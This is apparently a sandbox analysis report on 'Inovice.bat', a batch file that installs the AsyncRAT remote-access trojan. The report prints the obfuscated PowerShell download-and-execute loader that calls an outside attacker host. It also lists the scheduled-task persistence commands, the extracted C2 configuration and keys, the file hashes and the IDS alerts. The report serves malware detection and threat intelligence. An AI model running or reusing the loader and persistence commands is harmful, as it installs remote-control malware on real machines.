Field | Value
---|---
File name | Inovice.bat
Full analysis | https://app.any.run/tasks/3bd6edf1-e76e-40d5-bfaa-0ef4a844e6e8
Verdict | Malicious activity
Threats | AsyncRAT is a RAT that can monitor and remotely control infected systems. This malware was introduced on GitHub as legitimate open-source remote administration software, but attackers use it for its many powerful malicious functions.
Analysis date | December 05, 2022, 19:47:44
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
MIME | text/plain
File info | UTF-8 Unicode text, with very long lines, with CRLF line terminators
MD5 | BF021F142FA831D9BE71B25476DAF0F6
SHA1 | F2F5735ACD04E2228AC09586CAD425B82409F253
SHA256 | 8DBAC79CA4B263BE822F6DDAE805B854753E1118767353654CC26DAB34F44C49
SSDEEP | 192:lzJ1cqL+cWrc2DaODe779zgWg94YWNjaOfQ:pJ1cqL+cWrc2DFe77pgWg94YWNje
PID | CMD | Path | Indicators | Parent process | Details
---|---|---|---|---|---
3248 | C:\Windows\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\Inovice.bat" " | C:\Windows\system32\cmd.exe | — | Explorer.EXE | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
3712 | CMD.EXE /C POWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE[]];$2DE18D252BD8380E8B2956CA14B0AA53DE142937B1671F23937EB753D08D6268DB1724F34D8DDBE007F0401ED14E8A1D625989410FEEC1E3766844EDBF765246489E1DCC2D1833DA6E69D3385C4CBD5FD2D105456337A5B6341D7D7DFE413FE3F0A8B019='IEX(NEW-OBJECT NET.W';$83F3ACCD26BC00B0E6DDBA5A7DF914BDB72D2DBE20BB9DA9E3D42ECE19F6CAC2B23E1794130F2013493926E052E189D0CB23414E278E9AF673D174344A4188514E884F1E6E79DD70C9F0DD9E7FA60E1057D5C8803A140AAD1867A9700496CC4691BF08E5='EBCLIENT).DOWNLO';[BYTE[]];$8E36696559311019BAC3A3F1DBB8ADEF9E36ABF212EECE0D145B8E2EF94918878BDC1F5A8F360D5CE893479F38B5AD1B82BC263076F50F4842978BE4E8D31F43D29E8DD595302F3A0408597F05114E82276DD5DEBE0E2638386DDC128E3B63A3742B1032='2B19841E07075A88D200C3A1A0ED012553F0BF62A9A60ED56B2C7EF4BB2958045693D67249B31F577D3DE8F0D8CE3A6D0B2DE5D9D4FCC2D7E4618E8EA662F464B244D78C9F94B26666E8A737804CD2E8EBA8D64D240BB68CA60AB99C1B0285A27862FFA2(''http://198.20.177.229:444/x.png'')'.REPLACE('2B19841E07075A88D200C3A1A0ED012553F0BF62A9A60ED56B2C7EF4BB2958045693D67249B31F577D3DE8F0D8CE3A6D0B2DE5D9D4FCC2D7E4618E8EA662F464B244D78C9F94B26666E8A737804CD2E8EBA8D64D240BB68CA60AB99C1B0285A27862FFA2','ADSTRING');[BYTE[]];IEX($2DE18D252BD8380E8B2956CA14B0AA53DE142937B1671F23937EB753D08D6268DB1724F34D8DDBE007F0401ED14E8A1D625989410FEEC1E3766844EDBF765246489E1DCC2D1833DA6E69D3385C4CBD5FD2D105456337A5B6341D7D7DFE413FE3F0A8B019+$83F3ACCD26BC00B0E6DDBA5A7DF914BDB72D2DBE20BB9DA9E3D42ECE19F6CAC2B23E1794130F2013493926E052E189D0CB23414E278E9AF673D174344A4188514E884F1E6E79DD70C9F0DD9E7FA60E1057D5C8803A140AAD1867A9700496CC4691BF08E5+$8E36696559311019BAC3A3F1DBB8ADEF9E36ABF212EECE0D145B8E2EF94918878BDC1F5A8F360D5CE893479F38B5AD1B82BC263076F50F4842978BE4E8D31F43D29E8DD595302F3A0408597F05114E82276DD5DEBE0E2638386DDC128E3B63A3742B1032) | C:\Windows\system32\cmd.exe | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
1112 | POWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE[]];$2DE18D252BD8380E8B2956CA14B0AA53DE142937B1671F23937EB753D08D6268DB1724F34D8DDBE007F0401ED14E8A1D625989410FEEC1E3766844EDBF765246489E1DCC2D1833DA6E69D3385C4CBD5FD2D105456337A5B6341D7D7DFE413FE3F0A8B019='IEX(NEW-OBJECT NET.W';$83F3ACCD26BC00B0E6DDBA5A7DF914BDB72D2DBE20BB9DA9E3D42ECE19F6CAC2B23E1794130F2013493926E052E189D0CB23414E278E9AF673D174344A4188514E884F1E6E79DD70C9F0DD9E7FA60E1057D5C8803A140AAD1867A9700496CC4691BF08E5='EBCLIENT).DOWNLO';[BYTE[]];$8E36696559311019BAC3A3F1DBB8ADEF9E36ABF212EECE0D145B8E2EF94918878BDC1F5A8F360D5CE893479F38B5AD1B82BC263076F50F4842978BE4E8D31F43D29E8DD595302F3A0408597F05114E82276DD5DEBE0E2638386DDC128E3B63A3742B1032='2B19841E07075A88D200C3A1A0ED012553F0BF62A9A60ED56B2C7EF4BB2958045693D67249B31F577D3DE8F0D8CE3A6D0B2DE5D9D4FCC2D7E4618E8EA662F464B244D78C9F94B26666E8A737804CD2E8EBA8D64D240BB68CA60AB99C1B0285A27862FFA2(''http://198.20.177.229:444/x.png'')'.REPLACE('2B19841E07075A88D200C3A1A0ED012553F0BF62A9A60ED56B2C7EF4BB2958045693D67249B31F577D3DE8F0D8CE3A6D0B2DE5D9D4FCC2D7E4618E8EA662F464B244D78C9F94B26666E8A737804CD2E8EBA8D64D240BB68CA60AB99C1B0285A27862FFA2','ADSTRING');[BYTE[]];IEX($2DE18D252BD8380E8B2956CA14B0AA53DE142937B1671F23937EB753D08D6268DB1724F34D8DDBE007F0401ED14E8A1D625989410FEEC1E3766844EDBF765246489E1DCC2D1833DA6E69D3385C4CBD5FD2D105456337A5B6341D7D7DFE413FE3F0A8B019+$83F3ACCD26BC00B0E6DDBA5A7DF914BDB72D2DBE20BB9DA9E3D42ECE19F6CAC2B23E1794130F2013493926E052E189D0CB23414E278E9AF673D174344A4188514E884F1E6E79DD70C9F0DD9E7FA60E1057D5C8803A140AAD1867A9700496CC4691BF08E5+$8E36696559311019BAC3A3F1DBB8ADEF9E36ABF212EECE0D145B8E2EF94918878BDC1F5A8F360D5CE893479F38B5AD1B82BC263076F50F4842978BE4E8D31F43D29E8DD595302F3A0408597F05114E82276DD5DEBE0E2638386DDC128E3B63A3742B1032) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 10.0.14409.1005 (rs1_srvoob.161208-1155)
3992 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Roaming\Logs\install.vbs" | C:\Windows\System32\WScript.exe | — | powershell.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft ® Windows Based Script Host; Exit code: 0; Version: 5.8.7600.16385
3112 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass iex([IO.File]::ReadAllText('C:\Users\admin\AppData\Roaming\Logs\install.ps1')) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | WScript.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 10.0.14409.1005 (rs1_srvoob.161208-1155)
3428 | "C:\Windows\system32\schtasks.exe" /create /tn det /sc minute /st 00:10 /tr C:\Users\admin\AppData\Roaming\Logs\Loader.vbs | C:\Windows\system32\schtasks.exe | — | powershell.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Manages scheduled tasks; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
2624 | "C:\Windows\system32\schtasks.exe" /create /tn administartor /SC minute /MO 3 /tr C:\Users\admin\AppData\Roaming\Logs\Loader.vbs | C:\Windows\system32\schtasks.exe | — | powershell.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Manages scheduled tasks; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
2692 | C:\Windows\System32\WScript.exe "C:\Users\admin\AppData\Roaming\Logs\Loader.vbs" | C:\Windows\System32\WScript.exe | — | taskeng.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft ® Windows Based Script Host; Exit code: 0; Version: 5.8.7600.16385
1260 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass iex([IO.File]::ReadAllText('C:\Users\admin\AppData\Roaming\Logs\Report.ps1')) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | WScript.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 10.0.14409.1005 (rs1_srvoob.161208-1155)
2116 | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | AsyncRAT | powershell.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: aspnet_compiler.exe; Version: 4.0.30319.34209 built by: FX452RTMGDR

AsyncRAT configuration extracted from PID 2116 (aspnet_compiler.exe):

Field | Value
---|---
C2 | aboreda.linkpc.net
Ports | 6666
Version | \| Edit 3LOSH RAT
Autorun | false
Mutex | AsyncMutex_fghd
Certificate | MIIE8jCCAtqgAwIBAgIQANbiVxLaNmSYyv61DmCgDzANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjEwNDE0MjMyNTI3WhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAJZsIsXBl2b0q/B3i8jEIs3V21H0zFCak2edQRldp7T71gCRF3gDcDdUQ2gKHnqhJYT+n6ivj/5B... (truncated in the report)
Server_Signature | GN/8+ivB5wP1EgjZz+u1FhO8aO9NgzdVSIcOWchN4HViQsmv9aHf+cFGGYig0z/6sh99BuCvSo8a4DxHwzbuD8XTbnyWbMFpqRIBWVDUC2byxpV9WOSo/wIDfM1eH4aC7w2O2lw/+Vr46R+v9Q39gocEdKlWmM67S2+FMW/y50Q/CTXP/JRNcPLgJpEP9CwQ6ykMP/idAxxIyW279D0IqdLKbHCEmKQ8eNdQyDKv/0JJumBazodAsL4i+P0wdwFtHV3+JhpN2MmDzi67uD/WCEAqmZAvquDZAnaRZK2LrqCS... (truncated in the report)
AntiVM | false
PasteBin | true
bdos | false
Botnet | 
BTC Address | 
Aes_Key | 561bcf00f570f137c8049f75c5148cefbf0cac7746be869c32dad39fe5aefa7c
Salt | bfeb1e56fbcd973bb219022430a57843003d5644d21e62b9d4f180e7e6c33941
Install_Folder | %AppData%
Registry activity (all operations are writes):

PID | Process | Key | Name | Value
---|---|---|---|---
1112 | powershell.exe | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | EnableFileTracing | 0
1112 | powershell.exe | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | EnableConsoleTracing | 0
1112 | powershell.exe | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | FileTracingMask | 
1112 | powershell.exe | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | ConsoleTracingMask | 
1112 | powershell.exe | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | MaxFileSize | 1048576
1112 | powershell.exe | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | FileDirectory | %windir%\tracing
1112 | powershell.exe | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | EnableFileTracing | 0
1112 | powershell.exe | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | EnableConsoleTracing | 0
1112 | powershell.exe | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | FileTracingMask | 
1112 | powershell.exe | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | ConsoleTracingMask | 
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
1112 | powershell.exe | C:\Users\admin\AppData\Roaming\Logs\Report.ps1 | text | AFEB32EFA5CDAAEE1360F00886C19B10 | 8C46090FB44AF131902A35351D71A5026EEEF32B3CAF880A0C7398BE5D3AD85F
1112 | powershell.exe | C:\Users\admin\AppData\Roaming\Logs\Loader.vbs | text | 7A1F08FD27F797B5A5CC2D79F8F6BBA7 | 922DC773ABDFD0812B0E1ADCAABF9DEA2E5F0264573266CF0B024FEB984C632E
1112 | powershell.exe | C:\Users\admin\AppData\Roaming\Logs\install.vbs | text | E35D96B22A7A748D8A85089EA37B003E | 06B9130D3E031C4729AD96332ED15189D5391B88F81C5BBB0F3A94AC4A05185A
1112 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | dbf | 446DD1CF97EABA21CF14D03AEBC79F27 | A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
2116 | aspnet_compiler.exe | C:\Users\admin\AppData\Local\Temp\Cab15F1.tmp | compressed | FC4666CBCA561E864E7FDF883A9E6661 | 10F3DEB6C452D749A7451B5D065F4C0449737E5EE8A44F4D15844B503141E65B
2116 | aspnet_compiler.exe | C:\Users\admin\AppData\Local\Temp\Tar15F2.tmp | cat | 73B4B714B42FC9A6AAEFD0AE59ADB009 | C0CF8CC04C34B5B80A2D86AD0EAFB2DD71436F070C86B0321FBA0201879625FD
1112 | powershell.exe | C:\Users\admin\AppData\Local\Temp\5ls2h5gk.p1g.ps1 | binary | C4CA4238A0B923820DCC509A6F75849B | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
2116 | aspnet_compiler.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | binary | 3EC598FDA7DA5A6080350EADC34CA03F | 9739D6314CAEA5B5779C6D80E00F205CD57594DC702DAA458528BF92D1E1C1DB
1260 | powershell.exe | C:\Users\admin\AppData\Local\Temp\51v2aea5.1nk.ps1 | binary | C4CA4238A0B923820DCC509A6F75849B | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
1260 | powershell.exe | C:\Users\admin\AppData\Local\Temp\4cgvd2ku.ga3.psm1 | binary | C4CA4238A0B923820DCC509A6F75849B | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1112 | powershell.exe | GET | 200 | 198.20.177.229:444 | http://198.20.177.229:444/x.png | US | text | 243 Kb | malicious |
2116 | aspnet_compiler.exe | GET | 200 | 95.140.236.128:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?9f7f011d88e2d5c1 | GB | compressed | 61.4 Kb | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2116 | aspnet_compiler.exe | 198.20.177.229:6666 | aboreda.linkpc.net | SERVER-MANIA | US | malicious |
2116 | aspnet_compiler.exe | 95.140.236.128:80 | ctldl.windowsupdate.com | LLNW | US | malicious |
1112 | powershell.exe | 198.20.177.229:444 | aboreda.linkpc.net | SERVER-MANIA | US | malicious |
Domain | IP | Reputation
---|---|---
aboreda.linkpc.net | | malicious
ctldl.windowsupdate.com | | whitelisted
PID | Process | Class | Message |
---|---|---|---|
1112 | powershell.exe | Misc activity | ET INFO [TW] Likely Hex Executable String |
1112 | powershell.exe | Executable code was detected | ET SHELLCODE Common 0a0a0a0a Heap Spray String |
— | — | Potentially Bad Traffic | ET INFO Observed DNS Query to DynDNS Domain (linkpc .net) |
2116 | aspnet_compiler.exe | A Network Trojan was detected | ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server) |
2116 | aspnet_compiler.exe | A Network Trojan was detected | ET TROJAN Generic AsyncRAT Style SSL Cert |